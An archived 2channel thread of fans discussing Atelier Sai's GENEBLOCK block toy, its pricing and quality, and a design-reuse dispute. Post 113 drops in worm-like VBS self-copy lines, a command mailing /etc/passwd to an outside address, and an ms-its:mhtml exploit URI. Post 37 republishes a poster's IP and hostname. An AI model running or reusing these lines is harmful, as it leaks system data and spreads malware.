2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アトリエ彩 GENEBLOCK(ジェネブロック) EX-1

1 :ぼくらはトイ名無しキッズ:2006/10/27(金) 03:22:30 ID:QVYKJZPB0
12月にアトリエ彩から発売予定のブロックトイ、ジェネブロックについて語るスレです。

■荒らし・煽り・釣り・粘着・私怨叩きに対しては大人の対応を心がけましょう。
■他スレに迷惑をかけないこと。
■次スレは950前後で宜しく。

○公式
ttp://www.atsai.co.jp/geneblock/geneblocktop/geneblocktop.html
○EXシリーズのデザイナー、そうま氏
http://www.end-a.com/

2 :ぼくらはトイ名無しキッズ:2006/10/27(金) 03:25:24 ID:E/AwJmYG0
2gt

3 :ぼくらはトイ名無しキッズ:2006/10/27(金) 10:00:41 ID:uxR6bGC90
激レアマジヤバ3ゲット
そして1乙

ギミステは手持ちの同人版で足りるのでこっちを予約中

4 :ぼくらはトイ名無しキッズ:2006/10/27(金) 14:03:11 ID:X0tRx3IA0
ひょんなことからジェネげと〜。
彩BJPMと比べると凄く精度アップしてますよ。

5 :ぼくらはトイ名無しキッズ:2006/10/27(金) 18:11:39 ID:X0tRx3IA0
参考までに〜。
Fソル縛りでつ。

ttp://b4.spline.tv/chimera/?command=GRPVIEW&num=360

6 :ぼくらはトイ名無しキッズ:2006/10/27(金) 18:12:50 ID:1wTFep3V0
まさか…
中の人降臨?

7 :ぼくらはトイ名無しキッズ:2006/10/27(金) 18:38:16 ID:Yio1BQlO0
とりあえず自重しろ、中の人。

8 :ぼくらはトイ名無しキッズ:2006/10/27(金) 18:44:43 ID:X0tRx3IA0
はい。スメンナサイ

9 :ぼくらはトイ名無しキッズ:2006/10/27(金) 21:05:20 ID:fo+cGNYN0
>>5
速攻で削除された?

10 :ぼくらはトイ名無しキッズ:2006/10/27(金) 23:13:25 ID:nmGnqmZ00
なんか乗り遅れた〜
リークはNGなの?

11 :ぼくらはトイ名無しキッズ:2006/10/28(土) 00:17:09 ID:iAB//n7Z0
結局ジェネグループはそうまさんとハルハルさんの二人なのかな?

12 :ぼくらはトイ名無しキッズ:2006/10/28(土) 00:29:46 ID:PAh+l8h10
ジェネは国内工場で成型したりする可能性は無いのかね…

13 :ぼくらはトイ名無しキッズ:2006/10/28(土) 00:59:10 ID:iAB//n7Z0
その確率はともかく,可能性はあると思うけど。
彩が「なんでもいいからブツを作ってリリースすれば良い」という考えを
改めて質に注力してくれれば確率はかなり高くなるかな.
ジェネという新しいブランドを立ち上げたのはブロックトイを一事業として
続ける意思の表れだし、ひょっとすると、ひょっとするかも!

14 :ぼくらはトイ名無しキッズ:2006/10/28(土) 01:31:10 ID:LJPNAZdY0
や、BJPMを続けてたのも
「こんなチープトイでもそれなりに売れて利益が出るのは美味しい」
って判断だったっていうからね(一応内部情報?)。
安くつくってそこそこ売る、ってスタンスが変わるとは考えにくいけど。

後は、彩が大喜びしたであろうハニマチ系人気種の予定が無いことだけど、
そのうちジェネにもねじ込んでくるのか、また別名義トイとして出すのか…

15 :HG名無しさん :2006/10/28(土) 03:02:01 ID:yvmYbYwE0
ハルハルさんとそうまさんがロボ師だからなぁ。
当分なロボパーツ三昧?
まぁ彩がおにゃのコ系の造形師連れて来くのは時間の問題だとは思うが。

16 :ぼくらはトイ名無しキッズ:2006/10/28(土) 04:59:36 ID:LSX7es9P0
>>14
ハニマチの人気って最初だけだったじゃない?
2や3じゃ露骨にハズレ扱いで、迂闊に売れ残りを買うと
もーいびつな女体パーツばっかり出るわ出るわ。

17 :ぼくらはトイ名無しキッズ:2006/10/28(土) 09:02:01 ID:Oq7MmgX10
ハズレ扱いする人多いけど、ハニマチは割れやすいものの
あの流線型はシルエット出しに重宝してたぞオイラは。

18 :ぼくらはトイ名無しキッズ:2006/10/28(土) 09:07:23 ID:ahxMG/vk0
>>16
そりゃ…モノ自体はずっと一緒だったもんな。
MGでいえば、ガンダムやザクがいまだにver.1しか無いようなもんだ。
売れないだろそりゃ。
個人的には、成形の難しそうなこの手のパーツはPVCで付属させて
ハイブリッドキットとして売れば、と思うけど、どっちにしても
彩じゃ程度が知れてるだろうしな…

19 :ぼくらはトイ名無しキッズ:2006/10/28(土) 09:36:48 ID:vJyqNq5+0
前から男素体も欲しいと思ってるオイラは少数派?
もっとミクロマンとかアムドライバーとか買ってる客層にもアピールできると思うんだが。
もっとも、品質が伴わないと・・・だけど。

20 :ぼくらはトイ名無しキッズ:2006/10/28(土) 12:57:52 ID:LJPNAZdY0
>>19
それ何て神羅(ベータミゼットでも可)?

21 :ぼくらはトイ名無しキッズ:2006/10/28(土) 14:06:48 ID:Oq7MmgX10
保持力はスティックファスに近いものを感じる。

22 :ぼくらはトイ名無しキッズ:2006/10/28(土) 18:26:24 ID:PAh+l8h10
女体パーツは心底いらない、でも需要はあるだろうから
ロボットと女体は完全に分離して売ってほしい

23 :ぼくらはトイ名無しキッズ:2006/10/28(土) 20:19:14 ID:vJyqNq5+0
>>20
つまりこうやって例がいくつも上がるように、
男性素体もあってこそ玩具の王道だと思うわけ。

24 :ぼくらはトイ名無しキッズ:2006/10/28(土) 22:27:17 ID:kpaec9MyO
確かに男パーツは有った方が良いかもね。
そういうの好きな人も居るわけだし。
てか男にしろ女にしろ顔が未塗装なのは塗れない人には辛いんじゃないかな?

25 :ぼくらはトイ名無しキッズ:2006/10/29(日) 00:09:48 ID:H9qLB51l0
彩が得意(?)なのはやっぱり彩色済みパーツなのかな?

彩はどんなお客をターゲットにするんだろうね?

BJPMにギルドがあるようにジェネにもユーザグループってできるのかな?
ユーザグループができて「お客さんというよりもディーラーの集まり」に
なったら素材としても使ってもらいたいという彩の意思表示になるし、
どちらかというと俺はそうあって欲しいな。
そうまさんのデザインは好きだけど、いろんな人のデザインがあっても
良いと思う。

26 :ぼくらはトイ名無しキッズ:2006/10/29(日) 00:30:09 ID:a379mJ2a0
ちょっとパーツ区切りの細かくなったジョイントロボ
みたいな路線を希望w

27 :ぼくらはトイ名無しキッズ:2006/10/29(日) 20:05:57 ID:gzhNFc0W0
あみあみに大量に画像上がってるね。
第二弾のEXシリーズは正統派なデザインが揃っててwktk。
特にバレットジャックホシス

28 :ぼくらはトイ名無しキッズ:2006/10/29(日) 21:17:33 ID:+y3LLUcu0
行き着く先が同じだと理解してるんなら、そうま氏はギミステに入社してほしいわ
デザインはかっこいいと思うけど、品質がそれを全て台無しにする気がする。

29 :ぼくらはトイ名無しキッズ:2006/10/29(日) 21:30:57 ID:UdSoxxCV0
行き着く先が同じだとしても、ギルドを脱退までしてあの災と手を組んだのには
それなりのオトナの事情があったって事じゃねーの?

30 :ぼくらはトイ名無しキッズ:2006/10/29(日) 21:46:45 ID:H9qLB51l0
前例があるから叩かれるっていうことはそうまさんにもわかって
いたんだろうし。
それでも・・・なんだから、よっぽどの事情だよねぇ、きっと。

31 :ぼくらはトイ名無しキッズ:2006/10/29(日) 23:05:55 ID:+y3LLUcu0
想像力ないからオトナの事情は推測できないけど、このテの話題は荒れそうだからまぁいいや…

エクスサーバントやらエフソルジャーやらは、見ても何も感じなかったけど
エクストルーパーはモロに好みだw
レシピどおりに組んで飾りたいぐらい

32 :ぼくらはトイ名無しキッズ:2006/10/29(日) 23:26:48 ID:gzhNFc0W0
俺もエクストルーパー楽しみだわ。
一応貼っとくか

ttp://www.amiami.com/shop/?vgForm=ProductInfo&sku=GDS-5617B&template=review.html

33 :ぼくらはトイ名無しキッズ:2006/10/29(日) 23:46:09 ID:JPcK5uh70
コレ、旧Tフレームからパーツ流用してるのかな?
ヴァンガードホークの頭とかナイトファルコンの蹴爪とかヘルスコーピオンの腰機銃とか

34 :ぼくらはトイ名無しキッズ:2006/10/30(月) 00:03:06 ID:H9qLB51l0
ジェネブロックスは1つ(1機種)何枚組みでしょうか?
定価で\500だから2枚組みかな。

35 :ぼくらはトイ名無しキッズ:2006/10/30(月) 00:37:06 ID:7uUUgOo80
エクストルーパーは3色使ってるようだから、
ランナー3枚かも…

36 :ぼくらはトイ名無しキッズ:2006/10/30(月) 04:30:29 ID:VnONmigZ0
>>35
ってことは3枚で一つ525円なんだよな。
ものすごく安くね?

37 :ぼくらはトイ名無しキッズ:2006/10/30(月) 10:52:32 ID:2q3gLwsg0
http://nov.2chan.net/y/res/648436.htm

>> 無題 Name 名無し 06/10/30(月)10:11:25 IP:61.201.111.* No.649017
みこしろ今度は借金踏み倒して夜逃げこくなよw



IPアドレス 61.201.111.1
ホスト名 EATcf-617p1.ppp15.odn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL


38 :ぼくらはトイ名無しキッズ:2006/10/30(月) 16:08:35 ID:NVQo0a640
今までは
現物を前に試行錯誤のパズルな組み感
&見立て中心だったけど
ジェネは脳内で妄想した物をそのまま作れそう。

スネらしいスネ
腕らしい腕
任意のロボを
好きな頭、好きな武装に交換
ってのは夢だったから嬉しい。

正統派ロボが5体合体して大型ロボに…
とかできそう。

39 :ぼくらはトイ名無しキッズ:2006/10/30(月) 16:40:56 ID:NjeKr6h70
ジェネは洗練されたBJPMって感じか

ttp://www.amiami.com/shop/?vgForm=ProductInfo&sku=GDS-5617A&template=review.html
これなんか期待しまくり

でも、一番の問題はやっぱ精度だよな
ヘビーガーディアンみたいな合いの悪さだと可変は発狂しまくり

40 :ぼくらはトイ名無しキッズ:2006/10/30(月) 20:39:27 ID:03wzLIePO
>>38
確かにな〜
洗練されたBJPMはいい過ぎだけど、エフソルのアーマーユニットや変型は俺的にはかなりの壷だし、センス0のちょい組み替え派の俺にはいいね
スティックファスの精度くらいなら彩版以上に買うしな
ただし、EXは微妙かな・・・旧Tフレームが作れたりするなら買う
ただ、フォースユニット買って精度がスティックファスより悪かったら二度とカワネ

41 :ぼくらはトイ名無しキッズ:2006/10/30(月) 22:11:38 ID:QI7uyEvb0
ふと思ったんだが
今までべらぼうに高くて手を出し辛かったそうま氏の商品が安価で買えるようになるのか。

ジェネのパーツが外装として優れているかはまだ分からないけど
BJPMの外装系は外装としての使い勝手があんまり際立ってなかったからなぁ・・・

42 :ぼくらはトイ名無しキッズ:2006/10/30(月) 22:25:38 ID:tfrb2cog0
>>41
別に高いってほどのもんは無かったと思うが…
T−1は(特に今考えると、精度からいっても)充分「安い」価格だったし、
T−2、T−3は一応ガレキみたいなもんだからね。

個人的には、そうま氏のデザインはパーツ単位ではともかくレシピロボは
イマイチという印象が強いんだよな。脚ばかり長くてヌボーっと背が高いのが多いし、
T−2やT−3は彩クオリティのせいもあって、ポロリが激しかったし。

末端パーツ・外装パーツとしては本家BJPMがなかなか出さなかったパーツを
上手くまとめて出してくれてたと思うんで、どっちかというとそういう意味で期待かな。
外装系パーツとして使う分には、内格パーツほど低精度が致命傷にはなりにくいしね。

43 :ぼくらはトイ名無しキッズ:2006/11/02(木) 00:30:42 ID:4vFCVngC0
ジェネ公式に「EXSERVANTはランナー2種類」ってあるね。
つまり\525でランナー2枚ってことか。
それでもかなり安いなー。

ジェネに高精度版(=国産化?)の予定はないのかな?
あと、そうまさんデザインの汎用パーツがあるとうれしいなー。
情報ないですかー?中の人ー!

44 :ぼくらはトイ名無しキッズ:2006/11/02(木) 00:42:58 ID:4vFCVngC0
値段からすると、FSOLDIERは1枚、FORCEUNITは2枚組だな。
よーく見るとEXSERVANTとFSOLDIERのパーツは汎用的に使えそうに見える。
楽しみだなー。
発売延期は勘弁してね!>彩さん

45 :ぼくらはトイ名無しキッズ:2006/11/02(木) 00:49:48 ID:n+DbfA670
いくつかの書き込みにあるけど、ランナーの枚数で値段決まる訳じゃないと思うんだが。
パッケージ毎の色数増やせるのは良い面もあるな。

46 :ぼくらはトイ名無しキッズ:2006/11/02(木) 01:04:54 ID:4vFCVngC0
そうなの?
でも画像を見てもEXSERVANT=1枚、FSOLDIER=1枚、FORCEUNIT=2枚組じゃない?
虎のサンプル展示でフレームの様子はわかるのかな?

47 :ぼくらはトイ名無しキッズ:2006/11/02(木) 02:03:48 ID:n+DbfA670
すまん。どうでもいいようなこと書いて迷惑かけたかな。
引き合いに出してわるいけど>>36>>43とかの書いてる

 ってことは3枚で一つ525円なんだよな。ものすごく安くね?

 つまり\525でランナー2枚ってことか。それでもかなり安いなー。

みたいなのはランナーの構成を考えないと安いとも高いとも言えないなと思っただけ。
それとEXSERVANTは二枚だと思う。

48 :ぼくらはトイ名無しキッズ:2006/11/02(木) 08:19:40 ID:4vFCVngC0
確かにフレームの数だけで高い、安いを云々するのは違うかもね。了解!

49 :ぼくらはトイ名無しキッズ:2006/11/02(木) 12:29:25 ID:tRbP+WsK0
何このキモい流れ('A`)

50 :ぼくらはトイ名無しキッズ:2006/11/02(木) 15:35:53 ID:4mm5bzFM0
これ、結構組みやすいと予想。
最初から、ロボらしい形(長方形とか)になっているから
脛パーツがそのまま、上腕にも前腕にも太股にも使えるわけで。
色んな体型のロボになる。腕長とか脚太とか。
でっかいのを作る時は、大きな塊である胸パーツが四肢として使えそう。

51 :ぼくらはトイ名無しキッズ:2006/11/02(木) 17:57:10 ID:+hrd3Vyg0
>>50
組みやすいというか、取っ付きやすいって感じじゃないか?
その代わりパーツの汎用性が落ちてる。
BJPMと比べると無限に近い可能性があるブロックトイから、組み替え玩具の方向に一歩近づいた印象。

52 :ぼくらはトイ名無しキッズ:2006/11/02(木) 19:14:48 ID:x1ZPDXkbO
まぁ本家には劣るだろうが、ジェネだってかなり自由に作れると思うぞ?
直線的なパーツ、モールドが目立つのでカトキメカっぽいのに向いてるかと。
あと、20cm級の作品がかなり楽に作れそう

53 :ぼくらはトイ名無しキッズ:2006/11/03(金) 05:55:26 ID:/UvRFrCF0
入門:EXシリーズ
基本:Fソルジャー
中級・発展:〜ユニットシリーズ

上級:みこしろ版BJPM
って感じではないか?

54 :ぼくらはトイ名無しキッズ:2006/11/03(金) 10:46:07 ID:rI1bVrVu0
いや、パーツの融通さを考えればジェネの方が玄人向けだろ。
明らかに使いづらい形してるし。

55 :ぼくらはトイ名無しキッズ:2006/11/03(金) 13:29:29 ID:tm0TwvqF0
使いづらさっていうか「高すぎる自由度は敷居を上げる」って感じじゃない?
画像掲示板みてると大半は稚拙なビルドだからジェネ推奨だなw

56 :ぼくらはトイ名無しキッズ:2006/11/03(金) 14:04:30 ID:d8rYo2jS0
自由度は高くないだろ、特別。
公式レシピ的なロボを組むためのパーツ構成だし。

57 :ぼくらはトイ名無しキッズ:2006/11/03(金) 14:08:15 ID:tm0TwvqF0
>>56
言葉足らずだったようだが、自由度が高くて敷居が高いのは
ギミステ版BJPMのことを言ってるのさ

58 :ぼくらはトイ名無しキッズ:2006/11/03(金) 22:46:34 ID:9TfsxCE90
公式レシピ組むだけで満足しそうではある

59 :ぼくらはトイ名無しキッズ:2006/11/04(土) 14:50:47 ID:+CUMOAh50
久し振りにページを覗いてみたら
なんだこりゃ…

ttp://www.uri.sakura.ne.jp/~mikosiro/gimisuteirstp.htm
ttp://thumbnail.image.rakuten.co.jp/s/?@0_gold/amiami/main/GDS-5617A.jpg

60 :ぼくらはトイ名無しキッズ:2006/11/04(土) 17:20:51 ID:s+qq6vvS0
要はBJPMはおろかデザインまでパクったってことか。

61 :ぼくらはトイ名無しキッズ:2006/11/04(土) 17:33:24 ID:mdaF8EDG0
これはみこ氏のささやかな反抗かね
しょうがないのう災は

62 :ぼくらはトイ名無しキッズ:2006/11/05(日) 00:16:01 ID:dAPKmTvl0
みこしろさんも彩に(ハルハルさんに?)言いたいことがあるなら、
この状況で”ハルハルさんに僕がデザイン提供した「F1ランナー用
外装ガレキ」のロボデザインです。”と書くよりも”BJPM用に
提供したんだから他で使うな!”とハッキリ言えば良いのに。
ハッキリと主張できない理由でもあるのか?と思えてしまう。

63 :ぼくらはトイ名無しキッズ:2006/11/05(日) 01:08:08 ID:k7n3YsSY0
まさかBJPMとして提供されたデザインを商標を変えてその上で
流用するなんて卑怯なマネをするなんて誰も思わんからなあ

64 :ぼくらはトイ名無しキッズ:2006/11/05(日) 01:14:58 ID:dAPKmTvl0
そう、だからこそ、みこしろさんはこっそりサイトで嫌味を書くよりも、
きちんと「使うな」というべきでは?
もしきちんと主張をしているならサイトにあんなことは書かないだろうし。
こういう軽々しい行動が一部のみこしろ批判に繋がっていると思うからこそ
みこしろさんにはきちんとして欲しい。

65 :ぼくらはトイ名無しキッズ:2006/11/05(日) 01:23:27 ID:k7n3YsSY0
なんでそこで「〜〜だけどみこしろが悪い」になるのかイミフメw

66 :ぼくらはトイ名無しキッズ:2006/11/05(日) 01:42:37 ID:dAPKmTvl0
「みこしろが悪い」なんて書いてないよ。
「みこしろさんにきちんと行動して欲しい」と書いただけ。

67 :ぼくらはトイ名無しキッズ:2006/11/05(日) 02:07:54 ID:mZH+eZm30
×「みこしろさんにきちんと行動して欲しい」
○「災にきちんと行動して欲しい」

68 :ぼくらはトイ名無しキッズ:2006/11/05(日) 04:00:20 ID:ABU31dYa0
一応みこしろ氏は動いてるっぽいよ?

69 :ぼくらはトイ名無しキッズ:2006/11/05(日) 09:58:04 ID:l1S+oBor0
レイプ犯責めるより被害者の責任どうこう言うって正直どうなんだ

70 :ぼくらはトイ名無しキッズ:2006/11/05(日) 11:36:45 ID:g2k5DTsFO
デザインをほいほいタダで渡すから悪いんだろ?
一般人じゃなくてデザイナーなら尚更
尻軽女が裸写真を録られて(もちろん承諾済)それを流されて文句言うようなもん
とりあえずみこしろ氏みたいにこれからは変な事ならないよう頑張ってほしい

71 :ぼくらはトイ名無しキッズ:2006/11/05(日) 12:29:50 ID:97ROGF5x0
>>70

72 :ぼくらはトイ名無しキッズ:2006/11/05(日) 12:41:26 ID:l1S+oBor0
なんか痛々しい子が居るなwww

73 :ぼくらはトイ名無しキッズ:2006/11/05(日) 14:08:53 ID:g2k5DTsFO
みこしろ氏みたいにってジェネブロ応援してるみたいじゃないかorz
変な事ならないように頑張ってほしいって書いたつもりだったからorz

74 :ぼくらはトイ名無しキッズ:2006/11/05(日) 14:28:30 ID:1WjtzDR50
彩社員いいかげんにしてほしいな

75 :ぼくらはトイ名無しキッズ:2006/11/05(日) 16:14:57 ID:o3BQ1zEy0
>>74
おまえあふぉだろ?

76 :ぼくらはトイ名無しキッズ:2006/11/05(日) 16:25:45 ID:5wciXBFD0
彩アンチはBJPMスレへどうぞ。

77 :ぼくらはトイ名無しキッズ:2006/11/05(日) 22:05:57 ID:dAPKmTvl0
レイプ犯罪を比喩に使うなんて不謹慎な香具師だな。

もしみこしろさんが犯罪被害者だというなら「被害者も相手に賠償請求
するか、しかるべきところに被害を届けないと、だれもどうしようも
ない」ということだ。
つまり、黙って泣き寝入りするか、告訴するかを決断するべきで、
グチグチ言っていても何も始まらないし解決しない。

でも本当にみこしろさんは被害者なのか?
みこしろさん自身があのデザイン画をそのままBJPMで作りたいので
あればハルハルさんに渡さないでシリーズに加えればよかったはずだし、
ハルハルさんに騙し取られたわけでもないんだからみこしろさんを
被害者(すなわちハルハルさんを犯罪者)とするのはおかしいと思う。

でもまぁ俺がハルハルさんの立場なら、意地でもそんなデザイン画を
使わないと思うけどね。

78 :ぼくらはトイ名無しキッズ:2006/11/05(日) 22:47:37 ID:enXoMoxx0
みこしろ氏があのデザイン画を渡した時点では、「BJPMサポーターとしての活動に協力して」
の事だったわけで、そういう形で貰ったものを、(彩であろうがなかろうが)市場に出れば
競合商品になる商品のデザインとして何の告知もなしに盗用したんだから、これはクロでしょ。
画稿を渡した時点で、デザインについての権利もみこしろ氏から譲渡されてたのなら
犯罪とは言えないけど、道義的にやはりクロだし。

俺はみこしろ氏の安易さというか、脇の甘さから来る災難はある程度自業自得だと思ってる
(同人ベースの活動としては「騙された」「揉めた」で済むとしても、彩の参入以降は
 BJPM関連の活動はビジネスベースのものになってるわけで、企画や契約のゴタゴタは
 みこしろ氏のビジネス上の失敗として見ていいと思う)。
ただ、それとそこに付け入って姑息な真似をした彩なり関係者なりの責任は別の話だからね。

もっと言うなら、個人的な肩入れとかファン心理を除けば、こういう裏方のゴタゴタ全てが
ユーザーには関係のない話なんだけど。

79 :ぼくらはトイ名無しキッズ:2006/11/05(日) 22:56:22 ID:1/8+RKfY0
無料で提供したならそうだろけどね

80 :ぼくらはトイ名無しキッズ:2006/11/05(日) 23:50:57 ID:dAPKmTvl0
「BJPMサポーターとしての活動に協力して」 はそうだろうと思うから
自分なら意地でも使わないと思う。
今回の件がクロかどうかは本人同士が決めることだし、みこしろさんが
クロだと思うならそういうアクションをすれば良い。
でも、みこしろさんがしたのは嫌味っぽくサイトに画像を上げただけで、
きちんと抗議をしたのか?というのも疑問だな。

今のところどちらか一方を擁護するつもりは無いけど、どちらもキチンと
して欲しい。製品に関しても、その他に関しても。
BJPMもジェネブロックも、ブロックトイとして遊ぶだけじゃもったい
ないと思っているし。

81 :ぼくらはトイ名無しキッズ:2006/11/06(月) 10:35:41 ID:fZU6hRvu0
白黒どちらにしろ、元のデザインよりかっこ悪くなってるぜ。
ぞうま氏はギミックは作れても、パーツのタイミング取りが素人なみだからなあ。

82 :ぼくらはトイ名無しキッズ:2006/11/06(月) 10:39:59 ID:fZU6hRvu0
彩の戦略は店舗で実際に購入する客の大半はいきさつなど知らないままで買うだろうという.....
あまーい考えにもとづいているのだろうな
このBJPMは販促の大半が口コミとネットでおこなわれていて、この騒ぎは致命的なのはわからんだろうな。

83 :ぼくらはトイ名無しキッズ:2006/11/06(月) 11:21:05 ID:74MHWDzp0
ギミステBJPMが発表されたと同時に武器屋が彩版を叩き売りだしたのがある意味それを物語ってるな

84 :ぼくらはトイ名無しキッズ:2006/11/06(月) 11:42:48 ID:hmSCc0Af0
べつに

85 :ぼくらはトイ名無しキッズ:2006/11/06(月) 12:02:15 ID:fZU6hRvu0
>>84
ぷっ。
あせってるね社員

86 :ぼくらはトイ名無しキッズ:2006/11/06(月) 12:38:15 ID:hmSCc0Af0
>>85
どこかの吉害っぽい字面だな

87 :ぼくらはトイ名無しキッズ:2006/11/06(月) 12:52:48 ID:usW8NE410
>>83
彩が浅薄で姑息なのは同意だが、BJPMの投げ売りはギミステ展開発表以前からだ。
むしろ、彩版の品質の酷さが広く知られた結果であって、ギミステに関係なく彩が自爆しただけじゃね?

88 :ぼくらはトイ名無しキッズ:2006/11/06(月) 13:27:25 ID:6bY9CrW00
>>86
ああ。ここのガイキチっぽいな↓
http://ex9.2ch.net/test/read.cgi/net/1161715371/l50

89 :ぼくらはトイ名無しキッズ:2006/11/06(月) 15:18:45 ID:74MHWDzp0
>>87
発表ちょっと後(過去ログ漁った感じだと大体1週間後くらい?)に
新作のHJとGSD3以外のboxが9割引以下(GSGとA2が\100,GSDとHGが\500)という恐ろしい事になってた
それまでも半額だったから投げ売りではあったが、あそこまで酷い叩き売りはめったに見ないぞ…

90 :ぼくらはトイ名無しキッズ:2006/11/06(月) 16:56:43 ID:g8td6Ln60
正直BJPM自体ブーム下降気味だから両者轟沈で黒歴史が1番ありうる展開

91 :ぼくらはトイ名無しキッズ:2006/11/06(月) 19:07:40 ID:tqipaP3Q0
>>90
しかし水面下で同人クォリティのBJPMを渇望してる人間は結構いると思うんだ
まぁBJPMのブーム(?)を表面上とはいえ下降させた彩の罪は深いが

92 :ぼくらはトイ名無しキッズ:2006/11/06(月) 21:34:52 ID:oRmO//Mx0
彩がBJPMを一般に広めたという事実もあるのでは?
みこしろさんもそれを望んで彩と手を組んだんだし。

93 :ぼくらはトイ名無しキッズ:2006/11/06(月) 21:45:05 ID:usW8NE410
まあ「粗悪な品質のブロックトイとして」広めた、というのも事実だけどね。

ミクロマンやトランスフォーマーみたいに、伝統あるブランドw玩具でも、
猛烈に売れ残って小売を苦しめた挙げ句に一時期流通にそっぽ向かれた例も
あるくらいだから、
「BJPM?ああ、(彩の)アレね」
という風に認識されちまった事は不幸なことでもあるよ。

94 :ぼくらはトイ名無しキッズ:2006/11/06(月) 23:00:45 ID:oRmO//Mx0
じゃぁBJPMを棄ててジェネで心機一転!ってわけにはいかないか・・・
ジェネが国産で完璧精度!は永遠に夢なのか?

95 :ぼくらはトイ名無しキッズ:2006/11/06(月) 23:49:35 ID:7Tph6wTy0
>ジェネで心機一転
一般の人(ライトユーザー?)は区別つかないヨカン

96 :ぼくらはトイ名無しキッズ:2006/11/07(火) 00:30:42 ID:MTlhrkbl0
>>94
彩にそんな殊勝な心がけがあったならジェネなんて生まれないよ。

97 :ぼくらはトイ名無しキッズ:2006/11/07(火) 00:37:15 ID:LWQNRJXF0
マジレスすると、彩が関わってるかぎりは同人版BJPM並の品質も実現できないだろうね。
ギミステでなくとも、ブキヤなり何処なり別の企業と手を組めば、
ジェネも品質向上が望めるだろうけど…

BJPMに限らず、彩の商品はどれもこれもアレだからなあ…('A`)
アイテムのチョイスとか、企画レベルでは惹かれるものが多いだけに…

98 :ぼくらはトイ名無しキッズ:2006/11/07(火) 01:04:24 ID:2ZPfqoEE0
彩も日本国内で生産する計画を持っているよ。





と言ったらビックリする?

99 :ぼくらはトイ名無しキッズ:2006/11/07(火) 02:12:53 ID:PGzqMWdi0
>>98
ソース無しでは何とも…
国内生産が確定だとしても、彩が担当する時点で期待半分、疑い半分

>>95
下手すると
「BJPMが売れなかったから新鮮味を出すために名前を変えて出したんだな〜」
とか思われるかもしれんね

100 :ぼくらはトイ名無しキッズ:2006/11/07(火) 08:27:16 ID:t3yW6jC90
>>99
下手するも何も。

101 :ぼくらはトイ名無しキッズ:2006/11/07(火) 10:52:26 ID:gGMQ5kuY0
>>98
国内で生産しても、金型は以前のそのままでしょうに。
彩版の最大の問題は、ポールが丸くなくてつぶれていること。
これは金型時の精度が悪いわけで、国内でショットしても改善されません。

102 :ぼくらはトイ名無しキッズ:2006/11/07(火) 14:32:02 ID:p2InLjzz0
現実的には中国で作った金型を日本に持ち込むことは無いだろ。
国産化するなら金型製作から日本でやると思うよ。
つーか>>98は仮の話をしていると思われ。

103 :ぼくらはトイ名無しキッズ:2006/11/07(火) 14:46:09 ID:gGMQ5kuY0
>>102
それじゃあ、税金でとんでもなく金型代があがるからありえんな。
まあ、中国からもちこむのも>>102のいうとおり重量や関税で不可能に近いしな。
>>98よ。あきらめな。彩は彩さね。

104 :ぼくらはトイ名無しキッズ:2006/11/07(火) 15:53:01 ID:7nK+jPdZ0
なんでそんなに必死なの

105 :ぼくらはトイ名無しキッズ:2006/11/07(火) 17:10:04 ID:gGMQ5kuY0
下手な希望をもちたくないから。

106 :ぼくらはトイ名無しキッズ:2006/11/07(火) 17:58:37 ID:onoeq60n0
気にしないのが一番だと思うよ。
忘れた頃に店頭で見かけて「あ、そういえば」って買って帰って
いじってみてダメだったら何これダメじゃんって笑って忘れて
良いものだったら何これスゲエじゃんって喜べば良い。

107 :ぼくらはトイ名無しキッズ:2006/11/07(火) 18:30:27 ID:MTlhrkbl0
忘れた頃に店頭で見かけて「あ、そういえば」って買って帰って
いじってみてダメだったら何これダメじゃんって笑って忘れて(※)
以下(※)くり返し

彩製品と付き合うにはニワトリ並みの忘却力が必要だなW

108 :ぼくらはトイ名無しキッズ:2006/11/07(火) 19:12:59 ID:3P47XIzu0
ID:gGMQ5kuY0は単なる荒らしなのでスルーしましょう

109 :ぼくらはトイ名無しキッズ:2006/11/07(火) 23:36:23 ID:2ZPfqoEE0
純粋にジェネが国産になったらみんなはうれしいのかな?と疑問に思った
だけですから、ソースがあるような話じゃないです。

110 :ぼくらはトイ名無しキッズ:2006/11/08(水) 01:18:57 ID:ygkZt96v0
俺はジェネが国産になったら素直にうれしいよ
っていうかブロック系の玩具を使い捨て前提で買いたくない

111 :ぼくらはトイ名無しキッズ:2006/11/08(水) 08:11:47 ID:o80cdvCg0
国産=高品質という式は
必ずしも成立するとは限らないから注意。
大事なのは品質管理の体制。どんな出来にしろ
最終的にGOサインを出すのは彩であるはずだし。
彩の体制が変わらないと国産にしても結果が変わらない恐れだって
あるんだよ?がんばってほしいねぇ。


112 :ぼくらはトイ名無しキッズ:2006/11/10(金) 23:34:01 ID:FbcuqgB90
彩のページの通販は改装中になっているけど、これが再開されれば
シリーズすべてを買えるのかな?
彩の通販はあみとかに比べて安いの?

113 :ぼくらはトイ名無しキッズ:2006/11/11(土) 00:59:29 ID:TEnLrKVY0
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub


114 :ぼくらはトイ名無しキッズ:2006/11/11(土) 13:02:58 ID:iTqQwxiA0
>>112
普通に考えて、メーカー公式通販が小売より安いわけないだろ。

115 :ぼくらはトイ名無しキッズ:2006/11/11(土) 23:38:04 ID:O0OZApax0
やめてよね、本気で安売りしたら公式が小売に敵うわけないだろ!

116 :ぼくらはトイ名無しキッズ:2006/11/12(日) 00:23:02 ID:e0HqLV770
公式がなりふりかまわず安売りしたら卸値で売れるんだから、
小売店が負けるだろ?あり得ないとは思うけど。

でもさー、彩の通販って最初から「改装中」じゃなかった?

117 :ぼくらはトイ名無しキッズ:2006/11/12(日) 00:26:40 ID:YjfsTtML0
BJPMならキャラホビで半額よりちょっと高いくらいの値段で売ってたな

118 :ぼくらはトイ名無しキッズ:2006/11/12(日) 22:59:43 ID:e0HqLV770
ジェネのページに通販はないな。
BJPMは通販で売る予定があったのかな?

ところで、ジェネは3種が12月に発売だけど、その後の予定は情報ないね。
12月にきちんと発売して、後の予定もどんどん公開して欲しいものだ。

119 :ぼくらはトイ名無しキッズ:2006/11/13(月) 00:01:55 ID:epc2rcr10
>>118
とりあえず、あみでも見てこい。話はそれからだ。

120 :ぼくらはトイ名無しキッズ:2006/11/13(月) 00:43:22 ID:fEWNTxgn0
>>119
